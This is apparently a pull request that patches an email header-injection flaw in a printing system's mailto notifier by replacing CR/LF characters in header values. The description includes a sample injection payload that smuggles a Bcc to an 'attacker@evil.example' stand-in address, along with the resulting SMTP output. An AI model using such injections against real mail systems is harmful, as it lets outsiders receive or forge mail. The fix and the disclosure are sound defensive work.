### PR TITLE
strip CR/LF from email header values in mailto notifier

### DIFF
--- a/notifier/mailto.c
+++ b/notifier/mailto.c
@@ -38,6 +38,7 @@ void		email_message(const char *to, const char *subject, const char *text);
 int		load_configuration(void);
 cups_file_t	*pipe_sendmail(const char *to);
 void		print_attributes(ipp_t *ipp, int indent);
+char		*remove_newlines(char *s);
 
 
 /*
@@ -111,7 +112,10 @@ main(int  argc,				/* I - Number of command-line arguments */
   httpDecode64_2(temp, &templen, argv[2]);
 
   if (!strncmp(temp, "mailto:", 7))
+  {
     cupsCopyString(mailtoReplyTo, temp + 7, sizeof(mailtoReplyTo));
+    remove_newlines(mailtoReplyTo);
+  }
   else if (temp[0])
     fprintf(stderr, "WARNING: Bad notify-user-data value (%d bytes) ignored!\n",
             templen);
@@ -159,7 +163,7 @@ main(int  argc,				/* I - Number of command-line arguments */
     fprintf(stderr, "DEBUG: text=\"%s\"\n", text);
 
     if (subject && text)
-      email_message(argv[1] + 7, subject, text);
+      email_message(remove_newlines(argv[1] + 7), remove_newlines(subject), text);
     else
     {
       fputs("ERROR: Missing attributes in event notification!\n", stderr);
@@ -623,4 +627,31 @@ print_attributes(ipp_t *ipp,		/* I - IPP request */
             attr->num_values > 1 ? "1setOf " : "",
 	    ippTagString(attr->value_tag), buffer);
   }
+}
+
+
+/*
+ * 'remove_newlines()' - Replace carriage returns and line feeds with spaces.
+ *
+ * The recipient, reply-to, and subject strings come from the notify-recipient
+ * data and the event attributes (job-name, printer-name), so they can carry
+ * embedded CR/LF.  Those values are written into RFC 5322 header fields, where
+ * a bare CR or LF would start a new header and let an extra recipient or
+ * message body be injected.
+ */
+
+char *					/* O - Sanitized string */
+remove_newlines(char *s)		/* I - String to sanitize */
+{
+  char	*ptr;				/* Pointer into string */
+
+
+  if (s)
+  {
+    for (ptr = s; *ptr; ptr ++)
+      if (*ptr == '\r' || *ptr == '\n')
+        *ptr = ' ';
+  }
+
+  return (s);
 }


### PR DESCRIPTION
Found while reading the notification path, tracing how event attributes end up on the wire.

job-name is an IPP name value chosen by whoever submits the print job. cupsNotifySubject() drops it straight into the subject text:

    cups/notify.c:96
    snprintf(buffer, sizeof(buffer), "%s %s-%d (%s) %s", prefix,
             printer_name->..., job_id->..., job_name->..., state);

email_message() then writes that subject into an RFC 5322 header field with CRLF line endings and no sanitising:

    notifier/mailto.c:288
    cupsFilePrintf(fp, "Subject: %s %s%s", mailtoSubject, subject, nl);

So a job submitted with

    job-name = "report.pdf\r\nBcc: attacker@evil.example\r\nX-Injected: yes"

yields this on the SMTP stream:

    Subject: ... Print Job: office-42 (report.pdf
    Bcc: attacker@evil.example
    X-Injected: yes) completed

The bare CR/LF start new header lines, so the printing user controls extra recipients and injected content in every notification mail. The recipient address and the reply-to value (decoded from notify-user-data) land in the To:/Sender:/Reply-To: headers by the same route.

Conclusion: the header writer must not emit a CR or LF inside a field value. The patch replaces them with spaces in the subject, recipient, and reply-to strings before they reach the cupsFilePrintf header lines. After it the whole job-name stays on the single Subject line.